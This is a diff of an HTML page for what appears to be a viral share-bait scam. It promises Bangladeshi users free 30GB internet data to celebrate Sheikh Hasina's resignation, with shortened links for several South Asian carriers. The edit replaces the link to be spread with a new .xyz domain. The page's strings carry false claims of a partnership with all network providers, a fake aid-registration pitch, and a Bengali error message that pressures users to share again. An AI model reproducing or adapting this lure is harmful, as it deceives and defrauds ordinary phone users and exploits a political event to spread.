--- a/Victory-gifts.html
+++ b/Victory-gifts.html
@@ -572,7 +572,7 @@ $(document).click(function () {
 "*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
        <script>
-        var text1 = "*CONGRATULATIONS TO ALL BANGLADESH. সমস্ত বাংলাদেশকে অভিনন্দন..প্রধানমন্ত্রী শেখ হাসিনার পদত্যাগ উদযাপনের জন্য বিনামূল্যে 30GB INERNET ডেটা উপহার পান*%0A%0A THE GEN Z Partners With All network Providers To GIVE FREE 30GB DATA TO EVERYONE As Way Of Celebrating Victory.. আপনার পেতে নীচে আলতো চাপুন🎉*%0A%0A_TAP HERE_👇%0A*https://sign.mypetition.xyz/Victory-gifts.html#1722860912917*",
+        var text1 = "*CONGRATULATIONS TO ALL BANGLADESH. সমস্ত বাংলাদেশকে অভিনন্দন..প্রধানমন্ত্রী শেখ হাসিনার পদত্যাগ উদযাপনের জন্য বিনামূল্যে 30GB INERNET ডেটা উপহার পান*%0A%0A THE GEN Z Partners With All network Providers To GIVE FREE 30GB DATA TO EVERYONE As Way Of Celebrating Victory.. আপনার পেতে নীচে আলতো চাপুন🎉*%0A%0A_TAP HERE_👇%0A*https://get.dataplug.xyz/Victory-gifts.html*",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "কিছু ভুল হয়েছে!\nপোস্ট গণনা করা হয় না। আপনি এটি একই বন্ধু বা গ্রুপের সাথে একাধিকবার শেয়ার করেছেন, অনুগ্রহ করে পুনরায় শেয়ার করুন",
